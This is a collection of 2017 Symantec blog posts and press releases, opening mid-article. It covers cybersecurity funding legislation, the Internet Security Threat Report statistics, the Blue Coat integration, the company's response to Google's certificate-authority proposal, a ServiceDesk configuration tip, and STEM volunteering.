Dan Lohrmann, the longtime Chief Information Security Officer for the state of Michigan, talked about how a program like this would have been beneficial during his time working in state government.

“We were able to get millions of dollars in federal Department of Homeland Security (DHS) grants for cybersecurity for many different projects, ranging from new generators for data centers to anti-spam appliances to new encryption for laptops,” he wrote in an article on Government Technology. “Those grant dollars launched Michigan into the forefront of government cybersecurity leadership at the time, enabling us to implement many cyber protections and stop ongoing cyberattacks.”

This bill was recently introduced and sent for committee consideration. It is definitely one worth following as it offers states and localities an aid in acquiring key resources to improve their cyber defenses.

The State Cyber Resiliency Act has been introduced in both the House and Senate. If you are interested in keeping up-to-date on the progress of each, here are the direct links – House, Senate.

Movin’ on Up! Symantec Recognized as One of the World’s Best Corporate Citizens

Symantec Climbs 52 Places in Annual Corporate Responsibility Ranking

Last week, Corporate Responsibility (CR) Magazine announced their annual 100 Best Corporate Citizens List and we are proud to announce that Symantec has climbed 52 spots to #35! The ranking, in its 18th year, is based on publicly available disclosures for 260 indicators across key CR areas such as philanthropy/community engagement, environmental sustainability, human rights, climate change, employee relations, financial performance and corporate governance. Symantec’s highest rankings were in the areas of employee relations, including diversity and inclusion, (#3) and corporate governance (#5). 

The list looks at three key characteristics for each indicator – disclosure, policy and performance – all of which underline the core mission of CR Magazine and the purpose of the list – accountability. At CR magazine they “believe it’s vital for investors, regulators, customers, suppliers, and employees to know as much as possible about the companies they invest in, do business with, and work for.”

Accountability in this sense extends far beyond financial metrics to the impacts a company has on its people, communities and the environment. Within CR, trust and transparency are the building blocks of relationships with stakeholders internally and externally who help us make a positive impact and difference in the world.

Each year we look to expand and evolve our engagement and communication with stakeholders through our annual Corporate Responsibility report, ongoing communications such as our CR blog, through targeted disclosures such as CDP and EICC, socially responsible indices such as DJSI and FTSE4Good, and a variety of industry rankings.

This year we continued to expand our policies, drive performance, and improve disclosure, all strengthening accountability for:

  • Our planet: Continued implementation of our strategy to meet our ambitious, science-based goal to reduce GHG emissions by 30 percent by 2025 (compared with FY15). This includes optimizing the use of our spaces, implementing energy efficiency projects, leveraging clean and renewable energy sources, and engaging employees in energy conservation. For example, this year we are launching a Green Team campaign to support energy reduction efforts.
  • Our customers: Certifying 100 percent of our hardware products as Energy Star by the end of 2015. Additionally, in FY18, we will continue to work with our customers to educate professionals, their families and communities on the changing online safety landscape.
  • Our suppliers: Ensuring supply chain responsibility by implementing the Electronics Industry Citizenship Coalition’s (EICC) code of conduct with 100 percent of our Tier One suppliers.
  • Our communities and industry: Expanding our signature Symantec Cyber Career Connection (SC3) program that provides a pathway for underrepresented young adults and veterans to enter the cyber security field. To date, 87% of SC3 graduates are employed in cyber security and IT jobs, or are pursuing additional degrees.
  • Our people: Through our employee resource groups, public advocacy, and internal policy development, we are creating a culture where diverse talent can thrive and innovate, and better understand and serve our diverse global markets. For example, our publication #iamtech features the experience of technology professionals of diverse backgrounds, and we have been recognized as a leader for LGBTQ professionals, implementing guidelines to support employees transitioning on the job, developing inclusive bathrooms and joining hundreds of leading tech companies publicly standing up for regulation that supports people of all backgrounds.

While we are proud of this recognition, we also understand that true accountability and trust require continuous improvement and an evolution of our strategy and priorities. It also requires honesty about where our weaknesses lie. For example, our annual CR report highlights priority areas we are working to more strongly support, and it calls out if we have not met a goal on target and when we expect to do so. It also includes comments from our report and strategy review process, where we’ve received over 200 pieces of feedback on strengths and opportunities for improvement.

As CR magazine highlights:

“Being a good corporate citizen is a goal of most leading organizations, but actually achieving this can be a challenge in today’s business climate. There are many working pieces of a responsible operation—risk management, diversity and inclusion, and the supply chain for example—that make efficient and effective operations quite onerous. So when a company succeeds at being transparent, responsible, and accountable—with all aspects backed up by data—they end up earning a coveted spot on Corporate Responsibility Magazine’s 100 Best Corporate Citizens List.”

The very nature of our business—assuring the security, availability, and integrity of our customers' information—requires a global culture of responsibility. We are proud to be recognized for achieving our mission of bringing together our people, passions and powerful technology to support social and environmental priorities and make the world a better, safer place.

The full list of 2017 recipients can be accessed here

Trump Administration Proposed Budget Keeps Cybersecurity a Priority

For all the talk during political campaigns and even once in office, the true decisions are made when it comes time to determine a federal budget. Each spring the president submits a proposed budget to Congress that highlights the administration’s spending priorities for that year with a clear message: What gets funded is important.

In March, President Trump issued the first proposed budget of his administration. Called the “Budget Blueprint,” this document provided a general overview of where the administration wants to spend money in the upcoming fiscal year. While a number of federal agencies and programs face cuts as the administration looks to scale back government spending, the proposed budget indicates that cybersecurity will continue to be a major priority.

For example, the “Budget Blueprint” mentions the need for the American military to not only be superior on land, at sea and in the air, but also in cyberspace.

“As the world has become more dangerous— through the rise of advanced potential adversaries, the spread of destructive technology and the expansion of terrorism—our military has gotten smaller and its technological edge has eroded,” the budget said.

Overall, President Trump’s proposed budget includes 15 separate mentions of cybersecurity in the 53-page document. While dollar figures are still unclear it is obvious the Trump administration wants to continue to make investments in cybersecurity.

Cyber was one of the growing priorities during the Obama administration as well, as spending on cyber defenses continued to grow each year. It is obvious the Trump administration has similar ideas about cybersecurity, prioritizing cyber defense even as cuts are made elsewhere. Congress will still make changes to the budget, but it would be hard to imagine them looking to make drastic cuts to cyber spending.

There is a clear need for these investments. When federal agencies first built up their cyber capabilities the strategy at the time was to purchase individual systems that secured different parts of the network. Using a best-of-breed solution for each part of the enterprise seemed like a good idea at the time, but as systems became more complex agencies lost visibility into their networks.

That is beginning to change. With comprehensive security systems, agencies can now turn to solutions that protect data throughout its full lifecycle. The increased investments should fund more integrated, comprehensive solutions that are built to work together, as opposed to simply applying additional patches in a “band-aid” approach to securing these disparate systems. Agencies will get better visibility into their networks, allowing them to see everything that happens. This was not possible just a few years ago.

We are thrilled that the Trump administration is continuing to prioritize cybersecurity as it is an important component to any technology strategy. The U.S. government holds some of the most sensitive information in the world, and that data needs to be protected. The technology is here to make that mission easier than ever before. Let’s hope the buy-in from the top continues.

Alarming Increase in Targeted Attacks Aimed at Politically Motivated Sabotage and Subversion

Annual Threat Report from Symantec Details How Simple Tactics Led to Unprecedented Outcomes
  • One in 131 Emails Contained a Malicious Link or Attachment – Highest Rate in Five Years

  • Size of Ransoms Spiked 266 Percent; U.S. Top Targeted Country as 64 Percent of Americans Pay Their Ransom

  • CIOs Have Lost Track of How Many Cloud Apps are Used Inside Their Companies – When Asked Most Will Say up to 40 When in Reality the Number Nears 1,000 

Mountain View, Calif. – April 26, 2017 – Cyber criminals revealed new levels of ambition in 2016 – a year marked by extraordinary attacks, including multi-million dollar virtual bank heists and overt attempts to disrupt the U.S. electoral process by state-sponsored groups, according to Symantec’s (Nasdaq: SYMC) Internet Security Threat Report (ISTR)  Volume 22, released today.

“New sophistication and innovation are the nature of the threat landscape, but this year Symantec has identified seismic shifts in motivation and focus,” said Kevin Haley, director, Symantec Security Response. “The world saw specific nation states double down on political manipulation and straight sabotage. Meanwhile, cyber criminals caused unprecedented levels of disruption by focusing their exploits on relatively simple IT tools and cloud services.”

Symantec’s ISTR provides a comprehensive view of the threat landscape, including insights into global threat activity, cyber criminal trends and motivations for attackers. Key highlights include:

Subversion and Sabotage Attacks Emerge at the Forefront

Cyber criminals are executing politically devastating attacks in a move to undermine a new class of targets. Cyber attacks against the U.S. Democratic Party and the subsequent leak of stolen information reflect a trend toward criminals employing highly-publicized, overt campaigns designed to destabilize and disrupt targeted organizations and countries. While cyber attacks involving sabotage have traditionally been quite rare, the perceived success of several campaigns – including the U.S. election and Shamoon – points to a growing trend of criminals attempting to influence politics and sow discord in other countries.

Nation States Chase the Big Scores

A new breed of attackers revealed major financial ambitions, which may be an exercise to help fund other covert and subversive activities. Today, the largest heists are carried out virtually, with billions of dollars stolen by cyber criminals. While some of these attacks are the work of organized criminal gangs, for the first time nation states appear to be involved as well. Symantec uncovered evidence linking North Korea to attacks on banks in Bangladesh, Vietnam, Ecuador and Poland.

“This was an incredibly audacious hack as well as the first time we observed strong indications of nation state involvement in financial cyber crime,” said Kevin Haley, director, Symantec Security Response. “While their sights were set even higher, the attackers stole at least US$94 million.”

Attackers Weaponize Commonly Used Software; Email Becomes the Weapon of Choice

In 2016, Symantec saw cyber criminals use PowerShell, a common scripting language installed on PCs, and Microsoft Office files as weapons. While system administrators may use these common IT tools for daily management tasks, cyber criminals increasingly used this combination for their campaigns as it leaves a lighter footprint and offers the ability to hide in plain sight. Due to the widespread use of PowerShell by attackers, 95 percent of PowerShell files seen by Symantec in the wild were malicious.

The use of email as an infection point also rose, becoming a weapon of choice for cyber criminals and a dangerous threat to users. Symantec found one in 131 emails contained a malicious link or attachment – the highest rate in five years. Further, Business Email Compromise (BEC) scams, which rely on little more than carefully composed spear-phishing emails, scammed more than three billion dollars from businesses over the last three years, targeting over 400 businesses every day.

Caving in to Digital Extortion: Americans Most Likely to Pay Ransom Demands

Ransomware continued to escalate as a global problem and a lucrative business for criminals. Symantec identified over 100 new malware families released into the wild, more than triple the amount seen previously, and a 36 percent increase in ransomware attacks worldwide.

However, the United States is firmly in the crosshairs of attackers as the number-one targeted country. Symantec found 64 percent of American ransomware victims are willing to pay a ransom, compared to 34 percent globally. Unfortunately, this has consequences. In 2016, the average ransom spiked 266 percent with criminals demanding an average of $1,077 per victim up from $294 as reported for the previous year.

Cracks in the Cloud: The Next Frontier for Cyber Crime is Upon Us

A growing reliance on cloud services has left organizations open to attacks. Tens of thousands of cloud databases from a single provider were hijacked and held for ransom in 2016 after users left outdated databases open on the internet without authentication turned on.

Cloud security continues to challenge CIOs. According to Symantec data, CIOs have lost track of how many cloud apps are used inside their organizations. When asked, most assume their organizations use up to 40 cloud apps when in reality the number nears 1,000. This disparity can lead to a lack of policies and procedures for how employees access cloud services, which in turn makes cloud apps riskier. These cracks found in the cloud are taking shape. Symantec predicts that unless CIOs get a firmer grip on the cloud apps used inside their organizations, they will see a shift in how threats enter their environment.

About the Internet Security Threat Report

The Internet Security Threat Report provides an overview and analysis of the year in global threat activity. The report is based on data from Symantec’s Global Intelligence Network, which Symantec analysts use to identify, analyze and provide commentary on emerging trends in attacks, malicious code activity, phishing and spam.

Symantec will host a webinar on this year’s ISTR results on May 16 at 10 a.m. Pacific / 1 p.m. Eastern. For more information or to register, please go here. Please visit Symantec’s website to download the full report plus supplemental assets.

About Symantec

Symantec Corporation (NASDAQ: SYMC), the world’s leading cyber security company, helps organizations, governments and people secure their most important data wherever it lives. Organizations across the world look to Symantec for strategic, integrated solutions to defend against sophisticated attacks across endpoints, cloud and infrastructure. Likewise, a global community of more than 50 million people and families rely on Symantec’s Norton and LifeLock product suites to protect their digital lives at home and across their devices. Symantec operates one of the world’s largest civilian cyber intelligence networks, allowing it to see and protect against the most advanced threats. For additional information, please visit www.symantec.com or connect with us on Facebook, Twitter, and LinkedIn.

###

NOTE TO U.S. EDITORS: If you would like additional information on Symantec Corporation and its products, please visit the Symantec News Room at http://www.symantec.com/news. All prices noted are in U.S. dollars and are valid only in the United States.

Symantec, the Symantec logo and the Checkmark logo are trademarks or registered trademarks of Symantec Corporation or its affiliates in the U.S. and other countries. Other names may be trademarks of their respective owners.

1+1=3.2 Million: Further Integration of the Symantec and Blue Coat Intelligence Networks Greatly Strengthens Customer Protection

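When two companies are integrated, we often describe it as 1+1=3: the whole is greater than the sum of its parts. The integration of the Blue Coat and Symantec threat intelligence networks, however, has created an entirely new formula: 1+1=3.2 million.

Last October, we announced the first results of integrating the Blue Coat and Symantec threat intelligence networks, which contain trillions of pieces of security data. After we deeply integrated security telemetry, artificial intelligence and machine learning into our products, Symantec products can block an additional 3.2 million attacks every day. This marked improvement is mainly because our products draw on email telemetry as well as web and endpoint telemetry. Over the past year, the number of attacks launched through email has risen noticeably, especially attacks delivered through malicious URLs. This means organizations need to watch email, web traffic and endpoints together and understand the overall threat picture.

Other results of the Symantec and Blue Coat integration include: Symantec now protects 163 million email users, 80 million web proxy users, and 170 million consumer and enterprise endpoints, and the related products process nearly 8 billion requests every day. With this high level of visibility across endpoints, email and web traffic, Symantec can discover and block targeted attacks that previously could not be detected at any single control point. In addition, the combination of the two companies' products provides a solid foundation for Symantec's integrated cyber defense platform and allows Symantec products to share threat intelligence, improving customers' security across all control points.

With the acquisition of Blue Coat, Symantec became the only vendor able to provide connected endpoint, email and web protection on a single integrated intelligence platform. Symantec + Blue = 3.2 million more attacks blocked for our customers every day. As it turns out, 1+1 is far greater than 3.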


WEBINAR: 2017 Internet Security Threat Report (ISTR): A Review of the Threat Landscape

Webinar: May 16, 2017

TIME: 10:00 AM (PST) / 1:00 PM (EST)

DATE: May 16, 2017

SPEAKER: Kevin Haley, Director of Product Management for Symantec Security Technology and Response

2016 saw major shifts in techniques used by targeted attackers, the continued rise of ransomware and significant attacks from IoT devices. 

This webinar will share data from ISTR 22 to better understand the threats and trends that will affect us in 2017. It will cover key findings of the report and best practices to keep us protected in 2017.

Get the facts in this highly respected research report and learn why:

• Targeted attacks aimed at politically motivated sabotage and subversion have increased at alarming rates

• One in 131 emails contained a malicious link or attachment – highest rate in five years

• Size of ransoms spiked 266 percent; U.S. top targeted country as 64 percent of Americans pay their ransom

• CIOs have lost track of how many cloud apps are used inside their companies – When asked most will say up to 40 when in reality the number nears 1,000

Be the first to gain insight into the latest cyber threat trends and learn steps you can take to improve your security posture in 2017.

Please Join Us. Register Here

Symantec CA Response to Google Proposal and Community Feedback

We take our role as a key player in the trust ecosystem of the Internet very seriously. We believe that secure and compliant issuance of SSL/TLS certificates is fundamental to the security of the Internet and that we have a responsibility to collaborate with our customers and the broader community to continuously improve industry standards, and specifically our practices, for certificate issuance.

On March 23, Google posted a blog outlining a proposal to change how Symantec’s SSL/TLS certificates are recognized in Chrome. Their proposal stemmed from prior certificate mis-issuances that occurred in our Certificate Authority (CA) business, which we have taken extensive remediation measures to correct. We have carefully reviewed Google’s proposal and sought input from the broader browser and user community on this topic, which has informed our continuous improvement planning. This post outlines important measures that we propose to implement in our CA business. We believe our proposal addresses the concerns raised by Google about our CA business without imposing undue business disruption on our customers and Chrome users that we believe would result if Google implements its proposal.

Feedback from our Enterprise Customers

In addition to our review of public commentary on these issues, we have also sought input and feedback from Symantec customers on the compatibility and interoperability impact of the significant changes that could result from the implementation of Google’s proposal. These customers include many of the largest financial services, critical infrastructure, retail and healthcare organizations in the world, as well as many government agencies. This cohort is an important constituency that we believe has been under-represented to date in the public commentary that has been posted to the Google and Mozilla boards since large organizations rarely authorize employees to engage in such public discussions, particularly in an area related to security. We first solicited feedback to understand the disruption that a browser-initiated trust change, like the one proposed by Google, would cause organizations that opt to replace their existing SSL/TLS certificates in order to maintain interoperability with all browsers. We learned that these organizations’ publicly facing web applications, while extensive, only represent a fraction of their dependency on publicly trusted Symantec roots. Many large organizations have complex, and potentially undocumented and little-known dependencies on their certificate infrastructure. Examples of complex dependencies on Symantec public roots that our customers have shared or we have identified include:

  • Embedded devices that are pinned to certificates issued by a Symantec public root to communicate to resources over the Internet or Intranet. Replacing these certificates would result in immediate failures and the need to recode and reimage the firmware for these devices.

  • Mobile applications that have pinned certificates. Replacing server certificates would require these applications to be recoded, recompiled and redistributed.

  • Critical infrastructure organizations that use certificates issued off of Symantec roots to validate internal and external resources. In many cases, the applications being used are pinned to Symantec certificates.

  • Some large organizations use certificates chained to Symantec public roots for nearly all internal applications and communications. Many of these organizations are under regulatory requirements to encrypt even internal communications.

Additionally, many of these organizations estimate that just the planning process to prepare to move to a new certificate authority could take many months and in some cases years because of unknown and undocumented dependencies. Moreover, few large enterprises that we’ve received feedback from have implemented the level of certificate lifecycle automation required to enable safe and cost-effective adoption of shorter validity certificates. We believe that it is important for the broader community to understand and give more weight to these compatibility and interoperability risks, particularly given the fact that many of these organizations are prohibited from commenting publicly on these topics.

To give a perspective of scale, Symantec secures more than 80% of the world’s ecommerce transactions through its certificate infrastructure. Additionally, Symantec is the world’s largest provider of Organization Validation (OV) and Extended Validation (EV) certificates which are primarily used by large enterprises. Many of these certificates sit inside corporate and government networks and are an important part of the trust fabric of internal communications.

In short, our assessment based on customer feedback is that the interoperability and compatibility failures that could result from a large-scale certificate replacement or invalidation event would be significant and unpredictable.

Our Proposal to the Community

We understand the importance of providing transparency into our CA operations and responding to community questions and feedback to inspire trust. We propose to undertake the following actions in response to browser concerns and customer feedback as well as to increase trust and confidence in our processes and our commitment to the compliance frameworks set forth by the CA/B forum and browser root programs.

Our EV Process

Symantec has some of the most comprehensive Extended Validation processes in the industry. We have, on occasion, been criticized for the time it takes us to validate EV certificates while some of our competitors boast rapid (15-20 minute) validation times for EV. We believe that issuing an EV certificate represents the highest bar of certificate validation in the industry and that the process used to validate these certificates must be conducted with the appropriate care. The widespread adoption of Certificate Transparency for EV certificate issuance now makes it possible for independent third parties to compare the accuracy of these issued certificates. One such organization, Netcraft, has been evaluating EV issuance over time. Figure 1 below (source: http://trends.netcraft.com/www.symantec.com) represents their findings of Symantec EV certificate compliance compared to the rest of the industry.

Figure 1 - Symantec vs. Rest of Industry on EV Certificate Requirements.

The Netcraft numbers demonstrate strong EV requirements compliance for Symantec relative to our peers. Our point-in-time and recent period-in-time audits have demonstrated that we are issuing EV certificates in accordance with industry requirements. We are confident in our EV issuance practices, which we have informally benchmarked against other CAs. We believe our EV validation processes are among the most thorough ones employed by any CA. Nevertheless, to reassure the browser community regarding our EV issuance practices we propose to undertake the following:

    1.  We will commission a third party auditor to perform a backward-looking audit of all active EV certificates that have been issued by Symantec to give comfort around the validity and integrity of our EV certificates and our EV certificate issuance practices. This action is proposed as an alternative to Chrome’s suggestion to remove EV treatment of past or future issued EV certificates, which we believe is unjustified. We believe this additional audit of our EV certificates provides full transparency into our EV certificate practices and reaffirms confidence that our active Symantec EV certificates are trustworthy. Our intention is to complete this third party audit by August 31, 2017.

Registration Authority Authenticated and Issued Certificates

Historically, Symantec has issued SSL/TLS certificates either directly or through Registration Authority (RA) partners who have issued such certificates on Symantec’s behalf. We want to provide assurance that all Symantec certificates are properly issued. With these issues in mind:

     2.  We will commission a third party auditor to attest to the list of active certificates that had been issued by any prior SSL/TLS RA partner, including CrossCert, Certisign, Certsuperior and Certisur. The purpose of this action is to provide transparency regarding existing certificates validated by RA personnel. We believe this action also provides additional assurance regarding the efforts we have already undertaken to revalidate all active CrossCert certificates as well as review 100% of the certificates issued by the other former RA partners. Further, we will ask our external auditors to audit 100% of the work we have done to revalidate or review and, where necessary, remediate active certificates issued by all of these former SSL/TLS RA partners. Our intention is to complete this third party audit by August 31, 2017.

Increased Transparency 

We recognize that an accurate understanding of our past incidents is important to enable an objective evaluation of any proposal regarding this topic. We have responded to, and will continue to review and respond to the salient questions posed on the https://wiki.mozilla.org/CA:Symantec_Issues post at the mozilla.dev.security.policy forum to provide further transparency into our past compliance incidents.

Furthermore, we understand the importance of providing increased transparency into our CA operations. As part of our effort to do so, we will do the following:

   3.  We will conduct a six month period-in-time WebTrust audit for the period from December 1, 2016 to May 31, 2017. We will thereafter move to a cadence of quarterly WebTrust audits (in lieu of annual period-in-time audits), beginning with the period from June 1, 2017 through August 31, 2017, until such time as we receive four consecutive quarterly WebTrust audits without qualification. The purpose of this action is to provide greater transparency regarding our operations and new certificates issued by Symantec going forward.

   4.  We will publish a quarterly letter to update the community on the progress of our third party audits identified in this proposal and the progress of our continuous improvement program that incorporates the other actions in this proposal.  

   5.  We will work through the CA/B forum to recommend new (or where applicable, updated) guidelines for appropriate customer exception requests to baseline requests. While the CA/B forum has developed a process for exception requests, we believe it should consider further guidelines to assess the risk associated with these requests and determine conditions under which the CA/B forum might expeditiously approve exception requests.

   6.  We will endeavor to improve the timeliness of our responses to the browser community as well as the level of technical detail we provide in them, balancing the interest of the community to receive prompt responses to their questions with the time required to perform the investigative steps necessary to provide thorough responses to such questions.

Move to Shorter Validity Certificates

We support the added option of shorter validity certificates, as do several browsers and others in the ecosystem. Shorter validity certificates can reduce exposure in the case of an undetected key compromise, enable faster adoption of improvements to industry standards (e.g. move to ECDSA or SHA3), and drive more rapid remediation of potential TLS-related vulnerabilities (like Heartbleed) that can require certificate replacement.

  7.  By August 31, 2017, we will begin to broadly offer SSL/TLS certificates with three month validity periods to give our customers greater choice and flexibility in the validity periods of the certificates they purchase and deploy from Symantec. From the customer feedback we have received to date, we believe this offering may be most attractive to customers that have already enabled automation, such as customers and partners integrated with our APIs and e-commerce customers with less complex environments. In addition, we will continue our investments in automation to enable organizations with even the most complex infrastructure to practically and cost-effectively adopt shorter validity certificates. Our near term investments will focus on modernizing our certificate issuance systems and workflows to enable faster issuance, and developing tools that enable customers to rapidly and securely implement their certificates and configure their systems.

  8.  We will perform a domain revalidation of all issued certificates that have a validity period longer than nine months at the nine-month mark (at no additional cost to our customers). This approach is intended to balance the customer impact of replacing certificates, for those not ready to move to shorter validity certificates, with visibility that ensures that certificates are being used appropriately. We commit to working with the browser community regarding appropriate transparency mechanisms (e.g., an extension of CT logging, OCSP extension, signed DNS text record, or signed revalidation list) that provide an attestation to this revalidation and ensure accountability of our implementation of this action. An initial certificate validation is one level of authentication. Certificate domain revalidation post-deployment further extends the trustworthiness of the initial certificate, which is a positive extension of the CA trust model.

Continuous Improvement of our CA Operations

We seek to continuously improve our systems and processes around certificate issuance. With this in mind:

  9.  We are further increasing our investment in the Security and Risk function of our CA operations, with a focus on our security and compliance controls and risk assessments. As a first step, we are commissioning a third party to conduct a process and systems risk assessment of our CA operations. The scope of this assessment will include an inventory of our systems and use cases, and a review of the security controls we have in place with respect to all of our PKI services, including SSL/TLS certificates. This third party assessment will also incorporate red teaming and penetration testing of our processes and systems beyond what we do already. The purpose of this third party risk assessment, which we expect to complete by October 31, 2017, is to provide increased confidence in the risk management posture of our CA operations beyond WebTrust audit reports.

10.  We will update our Root Program to more directly compartmentalize different certificate use cases. This update will involve creating dedicated roots and/or sub-CAs, for example, to segment customers who today use our publicly trusted hierarchies for closed ecosystems like set-top boxes, for customers who have mixed ecosystems like point-of-sale systems and ATMs which connect to the same servers as browser-based applications, for customers who choose to use longer validity certificates, or for customers who serve disproportionately large web traffic. As certificates expire, we will issue new certificates that chain to the use case-appropriate roots.

11.  Industry analysts estimate that 50% or more of all network attacks targeting enterprises this year will take advantage of SSL/TLS encryption to bypass security controls. We believe that CAs have a necessary and critical role to play in validating whether an encrypted website is malicious. Symantec’s technology infrastructure includes a Global Intelligence Network that analyzes websites, domains, servers and web services at scale and runs both real-time and background checks on such external hosts, including over a billion previously unseen and uncategorized websites a day. Our Global Intelligence Network includes technology that categorizes websites into over 80 categories – e.g., “Financial Services,” “Education,” “Malicious Sources/Malnets” or “Suspicious” – based on linguistic analysis, inter-site relationships, host-attribute analysis and reputation and history. Modules within our Global Intelligence Network analyze site content such as images, video and embedded links and can run in-depth content analysis in over 50 languages to help categorize sites and identify potential risk. We will begin to use our Global Intelligence Network to identify encrypted websites that have an increased threat risk based on our rating categorization and take appropriate action to mitigate risk for our certificates associated with such sites.

Even though our past mis-issuance events have not, to our knowledge, resulted in customer harm, we consider compliance with industry standards a critical responsibility of our CA business. We believe our multi-faceted proposal addresses the concerns regarding the trustworthiness of Symantec’s past and future SSL/TLS certificate issuances. We also believe our proposal appropriately balances these concerns with the significant compatibility and interoperability risks, as well as customer burden, which would result from any proposal that limits the trust of existing Symantec SSL/TLS certificates, imposes shorter validity periods on newly issued Symantec certificates and/or removes EV recognition for our certificates in browsers.

We welcome constructive feedback to our proposal, which we understand may take time for the Internet community to fully consider. In the meantime, we will continue to solicit feedback from our customers and partners, which are important stakeholders that will be impacted by changes to our operations, whether as a result of our proposal or any other.

1 + 1 = 3.2 Million: Further Integration of Symantec and Blue Coat Intelligence Greatly Improves User Protection


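"One plus one equals three" is a cliché often heard about corporate synergy when two companies join forces. In other words, the whole is greater than the sum of its parts. However, the integration of Blue Coat and Symantec threat intelligence has produced an entirely new formula: "1 + 1 = 3.2 million."

In October 2016, we announced the first results of integrating Blue Coat and Symantec threat intelligence and reported that our security data had reached trillions of rows. As a result of further integrating telemetry from both sides and combining technologies based on artificial intelligence and machine learning across the portfolio, Symantec products now block an additional 3.2 million attacks every day. A major factor in this improvement was that we shared not only web and endpoint telemetry but also email telemetry across products. Over the past year, attacks carried out through email containing malicious URLs have surged. Enterprises therefore need complete visibility into email and web traffic in addition to endpoints, and a detailed understanding of the threat landscape.

The integration with Blue Coat has delivered other results as well. Symantec can now protect 163 million email users, 80 million web proxy users, and 175 million consumer and enterprise endpoints, and processes nearly 8 billion security requests every day across all products. It is precisely because of this level of visibility across endpoints, email, and web traffic that Symantec can now detect and block targeted attacks that could never have been detected from a single control point. Moreover, the merging of the Blue Coat and Symantec portfolios has established the foundation of Symantec's Integrated Cyber Defense Platform, allowing Symantec products to share threat intelligence and strengthen security for customers across every control point.

Symantec is the only vendor that can connect endpoint, email, and web protection on a single integrated intelligence platform. What made this possible was the acquisition of Blue Coat. With Symantec plus Blue Coat, an additional 3.2 million attacks are now blocked each day, strengthening protection for our customers. One plus one turned out to be far greater than three.

[Reference translation]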

Add Incident Hold Reasons For Servicedesk


Incident Management allows tickets to be placed on hold, delaying SLA calculations.  As a part of that hold process a reason must be provided for placing the incident on hold.  There is a default value of None Given, but this is a drop down field that can be easily customized by adding values to the Servicedesk Application Properties.  To do this:

  1. Open the ProcessManager Portal
  2. Click Admin>Data>Application Properties
  3. Click the Gear wheel to the far right of the ServicedeskSettings Profile
  4. Choose Display Definition Values
  5. On the far right there is another gear icon. Click it and choose Edit Values. Scroll down and under Category:Incident Management, there is an ImHoldReasons section.
  6. Click Edit and enter text representing the reasons (e.g. Vacation, Sickness, More Data Required, etc.) you wish to use for placing an incident on hold. Make sure to click Save when you are complete.
  7. Scroll to the bottom and click Save again.

This should add the options that you want to have referenced.

Seeing is Believing – Injecting Fun and Relevance into STEM Education for Youth


In school we often learn a subject without fully understanding why that subject is important more broadly and how it may be applied beyond our studies. In most cases, this is the reason we lose interest in different subjects at some point. Science, math and engineering can easily be among these subjects. Students often learn the concepts theoretically, but are not exposed to their applications in real life and to how central STEM is to many areas outside of science, math, technology and engineering – to nearly all industries.

Symantec has set a goal to excite, engage, and educate one million students in science, technology, engineering, and math (STEM) education through global nonprofit partnerships, with an emphasis on computer science and cyber security, by 2020 with an investment of $20 million.

We are therefore dedicating time and invested resources (awarding grants) supporting organizations and initiatives that reach students to inspire them with the applicability and importance of STEM subjects. Last quarter, our employees were busy volunteering across the world to help students see and believe the exciting role that STEM plays in our world today and into the future.  

India and Team Everest


A Symantec volunteer demonstrates STEM principles through engaging activities with youth in India.

Through a partnership with Team Everest, one of India’s largest youth focused nonprofits, Symantec conducted an educational science workshop for seventh and eighth standard school students. Working with a Team Everest representative, Symantec helped demonstrate STEM in action for the students.

For example, one activity involved a simple experiment of making a helicopter with a piece of paper. Step-by-step instructions were provided to the students who made and tested their own paper helicopters. Through this, the students walked through the mechanics of how air pressure is central to making helicopter blades rotate. Students were deeply engaged, able to participate and understand how basic science concepts are put into practice in their everyday lives.

Reading and Teen Tech City London

Symantec employees support London’s TeenTech City event, where cybersecurity games such as creating a fake Facebook account inject fun into STEM and demonstrate the important role of technology and cybersecurity.

Symantec employees in Reading, UK shared their technical expertise at this year’s TeenTech City event in London, the city’s most inspiring Technology and Science event, which was held at the Emirates Stadium, home of Arsenal Football Club. The event brought over 200 scientists, engineers and technologists to this prestigious venue to share a day of challenges and experiments with students from 500 schools across London. Symantec employees facilitated over 50 students and teachers throughout the day, educating them on a Cyber Security Game, and exposing the opportunity for students to experiment with fake Facebook accounts and individual profiles.

Dublin and I Wish

Only 17% of Irish university first-time entrants into computer science are female, and only 24% of first-time entrants into engineering are female. To help increase interest in STEM, 14 Symantec employees volunteered over 200 hours across two days at the 2017 I Wish STEM event in Dublin. Over 2,000 girls attended the event, which this year focused on “how STEM can change the world” to appeal to females who are often looking for a career that has a social impact.

The Symantec volunteer team informed and educated students to help influence their subject choices in school and show them what a career in STEM might look like. It was also an opportunity to engage with their teachers who are significant influencers in the classroom. In total 217 volunteer hours were donated by Symantec employees.

Warsaw and Dom Dickau Orphanage

Employees from Symantec’s Warsaw, Poland office donated recycled IT equipment to the Dom Dickau Orphanage, developing working computers and equipment to help the children research for their studies. Moving forward, the team will offer virtual language lessons to further support their learning.

Employees from Symantec’s Warsaw, Poland office donated recycled IT equipment to the Dom Dickau Orphanage to support student studies.
